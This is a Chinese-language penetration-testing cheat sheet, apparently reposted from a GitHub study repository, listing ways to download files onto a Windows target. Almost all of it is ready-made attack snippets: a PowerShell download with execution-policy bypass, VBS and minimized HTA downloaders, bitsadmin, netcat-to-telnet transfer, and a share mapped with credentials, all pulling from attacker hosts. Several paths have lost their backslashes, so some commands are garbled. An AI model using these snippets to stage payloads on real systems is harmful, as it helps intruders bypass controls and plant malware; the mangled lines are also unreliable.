转自:https://github.com/l3m0n/pentest_study
windows下文件传输
1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File .1.ps1
$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")
2、vbs脚本文件下载
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.206.101/file.zip",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "c:file.zip",2
下载执行:
cscript test.vbs
3、bitsadmin win03测试没有,win08有
bitsadmin /transfer n http://lemon.com/file.zip c:1.zip
4、文件共享 映射了一个,结果没有权限写
net use x: \127.0.0.1share /user:centoso.comuserID myPassword
5、使用telnet接收数据
服务端:nc -lvp 23 < nc.exe
下载端:telnet ip -f c:
c.exe
6、hta 保存为.hta文件后运行
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\demo.zip", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>